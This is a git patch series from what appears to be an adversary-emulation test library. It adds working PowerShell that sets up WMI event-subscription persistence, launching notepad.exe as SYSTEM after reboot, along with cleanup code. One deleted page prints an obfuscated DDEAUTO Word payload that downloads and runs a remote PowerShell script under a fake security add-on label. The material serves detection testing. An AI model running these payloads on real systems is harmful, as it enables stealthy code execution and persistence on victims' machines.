From 71a98582f19c2aa1826a516af5e24dd2fad5c51b Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Fri, 25 May 2018 11:06:32 -0400 Subject: [PATCH 1/2] T1084 COMPLETD FOR THE YAML GODS --- .../Persistence/Office_Application_Startup.md | 28 -------- ...ment_Instrumentation_Event_Subscription.md | 53 --------------- atomics/T1084/T1084.yaml | 64 +++++++++++++++++++ 3 files changed, 64 insertions(+), 81 deletions(-) delete mode 100644 Windows/Persistence/Office_Application_Startup.md delete mode 100644 Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md create mode 100644 atomics/T1084/T1084.yaml diff --git a/Windows/Persistence/Office_Application_Startup.md b/Windows/Persistence/Office_Application_Startup.md deleted file mode 100644 index 3cba413f..00000000 --- a/Windows/Persistence/Office_Application_Startup.md +++ /dev/null @@ -1,28 +0,0 @@ -# Office Application Startup - -MITRE ATT&CK Technique: [T1137](https://attack.mitre.org/wiki/Technique/T1137) - - -## DDEAUTO - -1. Open Word -2. Insert tab -> Quick Parts -> Field -3. Choose = (Formula) and click ok. -4. Once the field is inserted, you should now see "!Unexpected End of Formula" -5. Right-click the Field, choose "Toggle Field Codes" -6. Paste in the code from Unicorn or SensePost -7. Save the Word document. - -* [SensePost DDEAUTO](https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/) - - DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" - -* [TrustedSec - Unicorn](https://github.com/trustedsec/unicorn) - -Generate the payload and download.ps1 following the Unicorn instructions, or to make one "just work", follow the steps below. - - DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http:///download.ps1'); # " "Microsoft Document Security Add-On" - -## Word VBA Macro - -[Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail) diff --git a/Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md b/Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md deleted file mode 100644 index 291dd18f..00000000 --- a/Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md +++ /dev/null @@ -1,53 +0,0 @@ -## Windows Management Instrumentation Event Subscription - -MITRE ATT&CK Technique: [T1084](https://attack.mitre.org/wiki/Technique/T1084) - -### Persistence - -Example: -```powershell -#Run from an administrator powershell window -#Code references -#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af -#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 - -$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; - EventNameSpace='root\CimV2'; - QueryLanguage="WQL"; - Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; -$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs - -$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; - CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} -$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs - -$FilterToConsumerArgs = @{ -Filter = [Ref] $Filter; -Consumer = [Ref] $Consumer; -} -$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs -``` - -After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. - - -Cleanup: -```powershell -#Run from an administrator powershell window -#Code references -#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af -#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 - -$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" -$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" -$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" - -$FilterConsumerBindingToCleanup | Remove-WmiObject -$EventConsumerToCleanup | Remove-WmiObject -$EventFilterToCleanup | Remove-WmiObject -``` - -#### References - -https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af -https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 diff --git a/atomics/T1084/T1084.yaml b/atomics/T1084/T1084.yaml new file mode 100644 index 00000000..0b24f0fc --- /dev/null +++ b/atomics/T1084/T1084.yaml @@ -0,0 +1,64 @@ +--- +attack_technique: T1084 +display_name: Windows Management Instrumentation Event Subscription + +atomic_tests: +- name: Persistence + description: | + Run from an administrator powershell window + + After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. + + Code references + + https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af + + https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 + + supported_platforms: + - windows + + executor: + name: powershell + command: | + + $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + EventNameSpace='root\CimV2'; + QueryLanguage="WQL"; + Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; + $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs + + $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} + $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs + + $FilterToConsumerArgs = @{ + Filter = [Ref] $Filter; + Consumer = [Ref] $Consumer; + } + $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs + +- name: Persistence Cleanup + description: | + Run from an administrator powershell window + + Code references + + https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af + + https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 + + supported_platforms: + - windows + + executor: + name: powershell + command: | + + $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" + $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" + $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" + + $FilterConsumerBindingToCleanup | Remove-WmiObject + $EventConsumerToCleanup | Remove-WmiObject + $EventFilterToCleanup | Remove-WmiObject From bc6b72b8e44e30260ee66f521a117f834938d5f2 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 25 May 2018 15:06:46 +0000 Subject: [PATCH 2/2] Generate docs from job=validate_atomics_generate_docs branch=T1084 --- atomics/T1084/T1084.md | 79 +++++++++++++++++++++++++++++++++++++++ atomics/index.md | 4 +- atomics/matrix.md | 2 +- atomics/windows-index.md | 4 +- atomics/windows-matrix.md | 2 +- 5 files changed, 87 insertions(+), 4 deletions(-) create mode 100644 atomics/T1084/T1084.md diff --git a/atomics/T1084/T1084.md b/atomics/T1084/T1084.md new file mode 100644 index 00000000..e46c4146 --- /dev/null +++ b/atomics/T1084/T1084.md @@ -0,0 +1,79 @@ +# T1084 - Windows Management Instrumentation Event Subscription +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1084) +
Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts. (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015) + +Detection: Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) + +Platforms: Windows + +Data Sources: WMI Objects + +Permissions Required: Administrator, SYSTEM
+ +## Atomic Tests + +- [Atomic Test #1 - Persistence](#atomic-test-1---persistence) + +- [Atomic Test #2 - Persistence Cleanup](#atomic-test-2---persistence-cleanup) + + +
+ +## Atomic Test #1 - Persistence +Run from an administrator powershell window + +After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. + +Code references + +https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af + +https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 + +**Supported Platforms:** Windows + + +#### Run it with `powershell`! +``` +$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + EventNameSpace='root\CimV2'; + QueryLanguage="WQL"; + Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; +$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs + +$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} +$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs + +$FilterToConsumerArgs = @{ +Filter = [Ref] $Filter; +Consumer = [Ref] $Consumer; +} +$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs +``` +
+
+ +## Atomic Test #2 - Persistence Cleanup +Run from an administrator powershell window + +Code references + +https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af + +https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 + +**Supported Platforms:** Windows + + +#### Run it with `powershell`! +``` +$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" +$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" +$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" + +$FilterConsumerBindingToCleanup | Remove-WmiObject +$EventConsumerToCleanup | Remove-WmiObject +$EventFilterToCleanup | Remove-WmiObject +``` +
diff --git a/atomics/index.md b/atomics/index.md index 717cf275..8d23bb19 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -82,7 +82,9 @@ - [T1154 Trap](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1100 Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) -- [T1084 Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) +- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md) + - Atomic Test #1: Persistence [windows] + - Atomic Test #2: Persistence Cleanup [windows] - [T1004 Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) # defense-evasion diff --git a/atomics/matrix.md b/atomics/matrix.md index 4890a3d5..c8749882 100644 --- a/atomics/matrix.md +++ b/atomics/matrix.md @@ -55,7 +55,7 @@ | | | [Trap](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | | | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | | | | [Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Software Packing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | -| | | [Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Space after Filename](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | +| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Space after Filename](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | | | | [Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Timestomp](./T1099/T1099.md) | | | | | | | | | | | | [Trusted Developer Utilities](./T1127/T1127.md) | | | | | | | | | | | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 94ca2467..1c240798 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -182,7 +182,9 @@ - [T1209 Time Providers](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1100 Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) -- [T1084 Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) +- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md) + - Atomic Test #1: Persistence [windows] + - Atomic Test #2: Persistence Cleanup [windows] - [T1004 Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) # discovery diff --git a/atomics/windows-matrix.md b/atomics/windows-matrix.md index 8164f2bf..99183780 100644 --- a/atomics/windows-matrix.md +++ b/atomics/windows-matrix.md @@ -40,7 +40,7 @@ | | | [Time Providers](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | | | | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Regsvr32](./T1117/T1117.md) | | | | | | | | | | [Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Rootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | -| | | [Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Rundll32](./T1085/T1085.md) | | | | | | | +| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Rundll32](./T1085/T1085.md) | | | | | | | | | | [Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | | | | | | [Scripting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | | | | | | | [Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |